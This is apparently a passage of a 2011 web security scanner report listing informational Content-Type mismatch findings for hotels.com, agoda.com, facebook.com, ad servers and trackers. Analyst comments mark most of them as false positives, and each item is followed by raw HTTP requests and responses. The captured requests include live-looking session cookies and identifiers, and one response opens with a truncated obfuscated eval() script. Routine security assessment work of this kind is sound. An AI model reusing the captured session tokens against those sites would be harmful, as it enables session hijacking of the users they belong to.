P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 17382
Date: Mon, 03 Oct 2011 00:12:03 GMT
Connection: close

eval((function(s){var a,c,e,i,j,o="",r,t=".....................................................................................................................$@^`~";for(i=0;i<s.length;i++){r=t+s[i][
...[SNIP]...

28.78. http://survey.122.2o7.net/survey/dynamic/suites/332/hotelsallprod/list.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://survey.122.2o7.net
Path:   /survey/dynamic/suites/332/hotelsallprod/list.js

Issue detail

The response contains the following Content-Type statement: Content-Type: application/javascript. The response states that it contains script. However, it actually appears to contain plain text.

The 55-byte body is a single JavaScript call, s_sv_globals.onListLoaded('','','','hotelsallprod',[]), so the declared type is accurate and the "plain text" verdict is a false positive: one call statement with empty arguments is too little for a signature-based sniffer.

Request

GET /survey/dynamic/suites/332/hotelsallprod/list.js?1011730152590 HTTP/1.1
Host: survey.122.2o7.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113DC-40000109C022AF4B|4E62C9FC[CE]; s_vi_bax7Fmox7Emaibxxc=[CS]v4|2731656D85013995-4000010FA019802E|4E62CAD6[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F4C385012B37-4000010D6023C03D|4E65E986[CE]; s_vi_atamox7Ecaihem=[CS]v4|273678D105013232-60000102803384B7|4E6CF1A1[CE]; s_vi_x7Eaiex7Cx7Ex7Dc=[CS]v4|2736FFD8051613AB-600001A280003EFD|4E6DFFB0[CE]; s_vi_fox7Cxxjx7Djeejc=[CS]v4|2736FFD10515974F-6000017620169A35|4E6DFFA1[CE]; s_vi_x7Fhesx7Ebex7Ex7Fvx7Dx7Estrx7Ex7C=[CS]v4|2737302185161D3E-400001A26000301A|4E6EB475[CE]; s_vi_erx7Fillgdijg=[CS]v4|2737302185161D3E-400001A26000301C|4E6EB475[CE]; s_vi_nyhylx7B88x3F=[CS]v4|2737A31205158EF1-600001752000ED76|4E6F598F[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|2737A31205158EF1-600001752000ED78|4E6F598F[CE]; s_vi_imx7Exxdnevx7Cx7Ech=[CS]v4|2737EACF051D3328-40000105A00A4E23|4E6FE0F9[CE]; s_vi_x7Ecgozoezfo=[CS]v4|273F763B851D0AD0-600001292004F341|4E7EEC75[CE]; s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|273F778805160812-600001A3E03B8C61|4E7EEF10[CE]; s_vi_tghhjoxxgx7Dx7Emcoi=[CS]v4|273F778805160812-600001A3E03B8C63|4E7EEF10[CE]; s_vi_zocdx7Ex7Dhuyebx60h=[CS]v4|274278E405162358-400001A48009859F|4E84F1C7[CE]; s_vi_x7Cinsx7Fxxnjyhc=[CS]v4|274279178516188E-60000181A009BF0E|4E84F95C[CE]; s_vi_x7Cilgdijgnsx7F=[CS]v4|274278E405162358-400001A4800985A2|4E84F95C[CE]; s_vi_x60x7Dnlcjx60x7Fjaxxx60x7Dck=[CS]v4|2742D7A185160C0B-400001A6403B49A6|4E85AF42[CE]; s_vi_fx7Bhjeljfd=[CS]v4|2733218685011339-40000104A014EEE0|4E85AF42[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733218685011339-40000104A014EEDE|4E85AF42[CE]; s_vi_x7Ecprx7Dtxxx7Fetcprexxgt=[CS]v4|2742D7B70516058E-400001A48011F125|4E85AF42[CE]; s_vi_ygx60kkvx7Ex7Ckx7Dx7Dmac=[CS]v4|2742E48905010BCD-60000105E03C302F|4E85D0A9[CE]; s_vi_fxxx7Fttx7Feydbxxpberx7Ex7C=[CS]v4|2742E48E850110C2-40000108003ACF53|4E85D0BA[CE]; s_vi_x60tndctw=[CS]v4|2742E89D05013772-4000010500433CF5|4E85D137[CE]; s_vi_x60tndahx60=[CS]v4|2742E89E85160D39-600001A48031365B|4E85D13C[CE]

Response

HTTP/1.1 200 OK
Server: Omniture DC/2.0.0
Last-Modified: Tue, 09 Aug 2011 15:45:20 GMT
ETag: "1680bd-37-7375a400"
Accept-Ranges: bytes
Content-Length: 55
Cache-Control: max-age=7776000
Expires: Mon, 07 Nov 2011 15:48:02 GMT
xserver: www337
Content-Type: application/javascript
Date: Mon, 03 Oct 2011 00:10:13 GMT
Connection: close

s_sv_globals.onListLoaded('','','','hotelsallprod',[]);

28.79. http://uxm.thousandeyes.com/rest/json

Summary

Severity:   Information
Confidence:   Firm
Host:   http://uxm.thousandeyes.com
Path:   /rest/json

Issue detail

The response contains the following Content-Type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain plain text.

The body is the two-byte acknowledgement OK, for which text/plain would be accurate; the mislabel is harmless while the body is a constant. Separately, the _uxm_cid cookie set by the response carries the same value as the sid field of the data parameter in the request (which sent no cookies), so the identifier is taken from the client.

Request

GET /rest/json?data={%22aid%22:%2211%22,%22sid%22:%22D5E8C261-B1E7-4A8B-AEEE-A8B3463F3408%22,%22r%22:265892,%22si%22:1,%22url%22:%22http://www.agoda.com/%22,%22ua%22:%22Mozilla/5.0%20(Windows%20NT%206.1;%20WOW64)%20AppleWebKit/535.1%20(KHTML,%20like%20Gecko)%20Chrome/14.0.835.187%20Safari/535.1%22,%22dlt%22:10244,%22clt%22:29183,%22dcl%22:37693,%22lt%22:37694,%22nt%22:0,%22rc%22:0,%22ft%22:2013,%22dt%22:0,%22ct%22:0,%22sct%22:null,%22rqt%22:2006,%22rpt%22:2,%22let%22:1,%22nl%22:1886} HTTP/1.1
Host: uxm.thousandeyes.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.agoda.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:40:45 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref='/p3p/p3p.xml', CP='NOI NID HISa OTPa OUR UNRa BUS COM NAV'
Set-Cookie: _uxm_cid=D5E8C261-B1E7-4A8B-AEEE-A8B3463F3408; Domain=.thousandeyes.com; Expires=Tue, 02-Oct-2012 00:40:45 GMT
Vary: Accept-Encoding
Content-Length: 2
Content-Type: text/html

OK

28.80. http://www.agoda.com/js/MainTextSearch.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.agoda.com
Path:   /js/MainTextSearch.js

Issue detail

The response contains the following Content-Type statement: Content-Type: application/x-javascript. The response states that it contains script. However, it actually appears to contain unrecognised content.

The visible body is ordinary JavaScript (a trim() helper followed by further function definitions), so the declared type is correct and this is a false positive.

Request

GET /js/MainTextSearch.js?10.03.2011 HTTP/1.1
Host: www.agoda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.agoda.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=usyvurhj5s34qtup52oltx1d; agoda.version.02=CookieId=7523af68-b979-4a5c-9566-6cdf92488e9a&AllocId=7e8ed96e55a1afa44758a9a3548685a805d33aa9e52f062bd12dd4c14f0443858201818dc947029deb77f5ece1dfdd8b53ce5b4bcaab65f1374e65c5c00ce5341e3516961f3b6a770dff9a5728226b6f70b9ec62c57523af68b979a5c5666cdf92488e9a&TItems=2$1444075$10-03-2011 07:37$10-02-2012 07:37$; agodalbny=www.agoda.com_cluster_31

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 20 Sep 2011 10:50:50 GMT
Accept-Ranges: bytes
ETag: "061c298377cc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Date: Mon, 03 Oct 2011 00:38:35 GMT
Content-Length: 5704

...function trim(s)
{
   var l=0; var r=s.length -1;
   while(l < s.length && s[l] == ' ')
   {    l++; }
   while(r > l && s[r] == ' ')
   {    r-=1;    }
   return s.substring(l, r+1);
}

function doAlertTextE
...[SNIP]...

28.81. http://www.agoda.com/pages/agoda/default/page_traffic.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.agoda.com
Path:   /pages/agoda/default/page_traffic.aspx

Issue detail

The response contains the following Content-Type statement: Content-Type: text/html; charset=utf-8. The response states that it contains HTML. However, it actually appears to contain plain text.

The body is a server timestamp, 10/3/2011 7:38:11 AM, returned to an empty POST; text/plain would be accurate. Nothing from the request appears in the body, so the mislabel has no direct impact, but if a later version of this beacon ever echoes request data, a browser will parse it as HTML.

Request

POST /pages/agoda/default/page_traffic.aspx HTTP/1.1
Host: www.agoda.com
Proxy-Connection: keep-alive
Content-Length: 0
Origin: http://www.agoda.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.agoda.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=usyvurhj5s34qtup52oltx1d; agoda.version.02=CookieId=7523af68-b979-4a5c-9566-6cdf92488e9a&AllocId=7e8ed96e55a1afa44758a9a3548685a805d33aa9e52f062bd12dd4c14f0443858201818dc947029deb77f5ece1dfdd8b53ce5b4bcaab65f1374e65c5c00ce5341e3516961f3b6a770dff9a5728226b6f70b9ec62c57523af68b979a5c5666cdf92488e9a&TItems=2$1444075$10-03-2011 07:37$10-02-2012 07:37$; agodalbny=www.agoda.com_cluster_31; __utma=1.939961377.1317602256.1317602256.1317602256.1; __utmb=1.1.10.1317602256; __utmc=1; __utmz=1.1317602256.1.1.utmcsr=trip.com|utmccn=(referral)|utmcmd=referral|utmcct=/hotels.html

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Date: Mon, 03 Oct 2011 00:38:10 GMT
Content-Length: 20
Cache-Control: no-cache, no-store, must-revalidate, proxy-revalidate

10/3/2011 7:38:11 AM

28.82. http://www.agoda.com/pages/agoda/test/rendertime_techno.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.agoda.com
Path:   /pages/agoda/test/rendertime_techno.aspx

Issue detail

The response contains the following Content-Type statement: Content-Type: text/html; charset=utf-8. The response states that it contains HTML. However, it actually appears to contain plain text.

Same pattern as 28.81: a timestamp body served as text/html. The x and z query parameters do not appear in the response.

Request

POST /pages/agoda/test/rendertime_techno.aspx?x=1&z=20032 HTTP/1.1
Host: www.agoda.com
Proxy-Connection: keep-alive
Content-Length: 0
Origin: http://www.agoda.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.agoda.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=usyvurhj5s34qtup52oltx1d; agoda.version.02=CookieId=7523af68-b979-4a5c-9566-6cdf92488e9a&AllocId=7e8ed96e55a1afa44758a9a3548685a805d33aa9e52f062bd12dd4c14f0443858201818dc947029deb77f5ece1dfdd8b53ce5b4bcaab65f1374e65c5c00ce5341e3516961f3b6a770dff9a5728226b6f70b9ec62c57523af68b979a5c5666cdf92488e9a&TItems=2$1444075$10-03-2011 07:37$10-02-2012 07:37$; agodalbny=www.agoda.com_cluster_31; __utma=1.939961377.1317602256.1317602256.1317602256.1; __utmb=1.1.10.1317602256; __utmc=1; __utmz=1.1317602256.1.1.utmcsr=trip.com|utmccn=(referral)|utmcmd=referral|utmcct=/hotels.html

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Date: Mon, 03 Oct 2011 00:39:07 GMT
Content-Length: 20
Cache-Control: no-cache, no-store, must-revalidate, proxy-revalidate

10/3/2011 7:39:07 AM

28.83. http://www.burstnet.com/cgi-bin/ads/ad22156a.cgi/v=2.3S/sz=300x250A/NZ/9460/NF/RETURN-CODE/JS/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.burstnet.com
Path:   /cgi-bin/ads/ad22156a.cgi/v=2.3S/sz=300x250A/NZ/9460/NF/RETURN-CODE/JS/

Issue detail

The response contains the following Content-Type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain script.

The body is JavaScript wrapped in an HTML comment (<!-- ... -->), the old ad-tag convention for files pulled in with <script src>, and the /JS/ path segment says as much; the scanner is right that this is script. A JavaScript type is the correct one here for a practical reason: if X-Content-Type-Options: nosniff were added to this response while the type stayed text/html, browsers would refuse to execute it. The Set-Cookie headers with expiry dates in July 2011 delete earlier cookies, consistent with the BOO=opt-out cookie sent in the request.

Request

GET /cgi-bin/ads/ad22156a.cgi/v=2.3S/sz=300x250A/NZ/9460/NF/RETURN-CODE/JS/ HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BOO=opt-out

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Ad-Reach: Burst!Media
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 248
Date: Sun, 02 Oct 2011 23:58:59 GMT
Connection: close
Set-Cookie: TID=1; path=/; expires=Mon, 04-Jul-2011 23:58:58 GMT; domain=.burstnet.com
Set-Cookie: /ad22156.11567=,CFC,GFC; path=/
Set-Cookie: TData=1; path=/; expires=Mon, 04-Jul-2011 23:58:58 GMT; domain=.burstnet.com
Set-Cookie: CMS=1; path=/; expires=Mon, 04-Jul-2011 23:58:58 GMT; domain=.burstnet.com
Set-Cookie: CMP=1; path=/; expires=Mon, 04-Jul-2011 23:58:58 GMT; domain=.burstnet.com
Set-Cookie: __qca=1; path=/; expires=Mon, 04-Jul-2011 23:58:58 GMT; domain=.burstnet.com
Set-Cookie: /PC=0; path=/; expires=Sun, 09-Oct-2011 23:58:58 GMT
Set-Cookie: /SC=0-2vc.1; path=/


<!--
var cb = Math.random();
var d = document;
d.write('<script language="JavaScript" type="text/javascript"');
d.write('src="http://optimized-by.rubiconproject.com/a/7743/12359/21900-15.js?cb=
...[SNIP]...

28.84. http://www.cheaptickets.com/cacheable/empty.html

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.cheaptickets.com
Path:   /cacheable/empty.html

Issue detail

The response contains the following Content-Type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain plain text.

The eight-byte body is an empty HTML comment, <!-- -->, which is valid HTML; text/html is defensible and this is a false positive. The misspelt Cteonnt-Length: 8 header beside a correct Content-Length: 8 is response debris of the kind some load balancers produce when they rewrite that header, not a transcription error in the report.

Request

GET /cacheable/empty.html HTTP/1.1
Host: www.cheaptickets.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cheaptickets.com/shop/hotelsearch?type=hotel&hotel.keyword.key=bos&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/09/11&hotel.chkout=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=7567558764917771317602252; NSC_xxx.difbqujdlfut.dpn.80_gxe=ffffffff09e3887845525d5f4f58455e445a4a423660; JSESSIONID=E880BFD3C49D42E3; logging=E880BFD3C49D42E3||egapp2218p.prod.orbitz.net; curr=USD; BetaGroup="10/02/2011 19:37:33|B|A|C|C|C|H|B|P|A"; TrafficGroup="10/02/2011 19:37:33|P"; myTests=%3A%7C%3A%7C%3A%7C%3A%7C%3A%7CUBP_ErrorMessaging%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; MKTG=ABCDEFGHU0VNfEMxNjAzNngzNTR8IHwxMzE3NjAyMjUzMjI3fEMxNjAzNngzNTR8fDEwLzAyLzIwMTEgMTk6Mzc6MzMgUE18IHwg; dpc=HOTEL%7C2.2%7C%7Cbos%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-09%7C2011-10-16%7C%7C+%7C%26%26HE; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e33a3045525d5f4f58455e445a4a4217b9; mbox=check#true#1317602329|session#1317602268649-666039#1317604129

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 26 Sep 2011 15:42:24 GMT
ETag: "8-4adda015a1800"
Cache-Control: max-age=14400
Expires: Mon, 03 Oct 2011 03:55:56 GMT
Content-Type: text/html
Cteonnt-Length: 8
Server: Apache
Date: Mon, 03 Oct 2011 00:38:15 GMT
Age: 2539
Connection: keep-alive
Content-Length: 8

<!-- -->

28.85. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The response contains the following Content-Type statement: Content-Type: text/html; charset=utf-8. The response states that it contains HTML. However, it actually appears to contain plain text.

The body is the error string "Given URL is not allowed by the Application configuration.": the Connect endpoint rejected the channel and redirect URLs passed in the request for app 158327657537972. text/plain would be accurate for this message, and nothing from the request is echoed in the body shown.

Request

GET /extern/login_status.php?api_key=158327657537972&app_id=158327657537972&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3e0e142%26origin%3Dhttp%253A%252F%252Fwww.hotels.com%252Ff2f34f73a%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1614ac084%26origin%3Dhttp%253A%252F%252Fwww.hotels.com%252Ff2f34f73a%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1089edae8%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfd74f8a6%26origin%3Dhttp%253A%252F%252Fwww.hotels.com%252Ff2f34f73a%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1089edae8&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df31b76cd44%26origin%3Dhttp%253A%252F%252Fwww.hotels.com%252Ff2f34f73a%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1089edae8&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df222c04f5c%26origin%3Dhttp%253A%252F%252Fwww.hotels.com%252Ff2f34f73a%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1089edae8&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.177.62
X-Cnection: close
Date: Mon, 03 Oct 2011 00:28:23 GMT
Content-Length: 58

Given URL is not allowed by the Application configuration.

28.86. http://www.getaroom.com/browse/market_deals

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.getaroom.com
Path:   /browse/market_deals

Issue detail

The response contains the following Content-Type statement: Content-Type: text/javascript; charset=utf-8. The response states that it contains script. However, it actually appears to contain HTML.

The body is JavaScript that assigns HTML fragments to this.heading_update[...] and this.deals_cache[...] for the XMLHttpRequest caller to insert into the page; the scanner is reacting to the markup inside the string literals, and the declared type is correct. Markup built server-side and inserted client-side depends entirely on server-side encoding; the truncated body does not show any dynamic values.

Request

GET /browse/market_deals?market_id=10 HTTP/1.1
Host: www.getaroom.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.getaroom.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: affiliate=032ea00e; www_session=BAh7CzoLc2VhcmNoaQM79eU6EWdlb19sb2NhdGlvbnsIOhFjb3VudHJ5X2NvZGUiB1VTOhJjdXJyZW5jeV9jb2RlIghVU0Q6EWNvdW50cnlfbmFtZSISVW5pdGVkIFN0YXRlczoPc2Vzc2lvbl9pZCIlNGYwYmM2NTg4ZGQ1NjhkZDAyNzJiNTc2ODQ4ZGU2ZjE6EF9jc3JmX3Rva2VuIjFUeFhFMHM5NXkzS2tHYTFGQmdhSGJxczRKT05qaU55SFFQOHJDWmJ6SVZBPSIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsGOgtub3RpY2UiJlBsZWFzZSBlbnRlciBhIHZhbGlkIGRlc3RpbmF0aW9uLgY6CkB1c2VkewY7DVQ6E3JlbW90ZV9hZGRyZXNzIhI1MC4yMy4xMjMuMTA2--b58708075c48fab0524aa6038b8528509d08eae7; show_pu=pageview=1&allowed=true&shown=false; __utma=155214180.1038388400.1317602249.1317602249.1317602249.1; __utmb=155214180.2.9.1317603739739; __utmc=155214180; __utmz=155214180.1317602249.1.1.utmcsr=trip.com|utmccn=(referral)|utmcmd=referral|utmcct=/hotels.html

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Connection: keep-alive
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.8
ETag: "c52e212f54eec4829ea5658dd625fe7e"
P3P: CP="CAO DSP DEVa TAIa OUR BUS UNI NAV STA PRE LOC", policyref="/w3c/p3p.xml"
X-Runtime: 489
Set-Cookie: show_pu=pageview=1&allowed=true&shown=false; path=/
Set-Cookie: www_session=BAh7CzoLc2VhcmNoaQM79eU6EWdlb19sb2NhdGlvbnsIOhFjb3VudHJ5X2NvZGUiB1VTOhJjdXJyZW5jeV9jb2RlIghVU0Q6EWNvdW50cnlfbmFtZSISVW5pdGVkIFN0YXRlczoPc2Vzc2lvbl9pZCIlNGYwYmM2NTg4ZGQ1NjhkZDAyNzJiNTc2ODQ4ZGU2ZjE6EF9jc3JmX3Rva2VuIjFUeFhFMHM5NXkzS2tHYTFGQmdhSGJxczRKT05qaU55SFFQOHJDWmJ6SVZBPSIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoTcmVtb3RlX2FkZHJlc3MiEjUwLjIzLjEyMy4xMDY%3D--4a29eac522682a877f487f79d32005f0cda149f5; domain=.getaroom.com; path=/; HttpOnly
Cache-Control: private, max-age=0, must-revalidate
Server: nginx/0.8.55 + Phusion Passenger 3.0.8 (mod_rails/mod_rack)
Content-Length: 8536

this.heading_update[this.deals_cache_index] = '<div id=\"deals_heading\"><h2>Hotel Deals of the Day &#183; <span id=\"updated_deals_heading\">Washington DC<\/span><\/h2><\/div>';

this.deals_cache[thi
...[SNIP]...

28.87. http://www.hotels.com/hoteldetails/urgencypopup.html

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.hotels.com
Path:   /hoteldetails/urgencypopup.html

Issue detail

The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /hoteldetails/urgencypopup.html?hotelId=109368 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; 